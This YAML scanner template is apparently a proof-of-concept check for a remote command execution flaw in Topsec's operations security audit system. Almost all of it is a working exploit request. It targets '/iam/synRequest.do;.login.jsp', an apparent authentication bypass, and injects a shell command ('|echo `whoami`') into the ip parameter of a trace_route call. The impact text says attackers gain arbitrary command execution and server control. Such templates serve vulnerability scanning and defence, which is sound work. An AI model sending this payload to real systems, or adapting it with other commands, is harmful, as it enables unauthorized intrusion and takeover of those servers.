32 lines
1.3 KiB
YAML
32 lines
1.3 KiB
YAML
keyword: iam
|
||
name: 天融信运维安全审计系统远程命令执行漏洞
|
||
description: | # 下一行可填写漏洞描述
|
||
天融信运维安全审计系统synRequest存在远程命令执行漏洞
|
||
requests: # 为空代表默认或者不启用
|
||
path: "/iam/synRequest.do;.login.jsp"
|
||
method: POST
|
||
headers:
|
||
Accept: '*/*'
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8
|
||
Referer: https://www.baidu.com
|
||
Accept-Encoding: gzip, deflate
|
||
Sec-Fetch-Dest: empty
|
||
Sec-Fetch-Mode: cors
|
||
Sec-Fetch-Site: same-site
|
||
body-raw: |- # 如果需要发送请求体,在下一行开始填写
|
||
method=trace_route&w=1&ip=127.0.0.1|echo%20`whoami`%3b&m=10
|
||
|
||
response:
|
||
path: "" # 不填则默认接收此请求的响应包
|
||
status-code: 200
|
||
body: " " # 此处可填写响应体中确认漏洞存在的关键字或者其他信息
|
||
time: # 此处填写响应包响应时间,默认不启用
|
||
headers:
|
||
Server:
|
||
Content-type:
|
||
Content-length:
|
||
Date:
|
||
Connection:
|
||
impact: | # 下一行可填写漏洞影响
|
||
天融信运维安全审计系统synRequest存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器权限。
|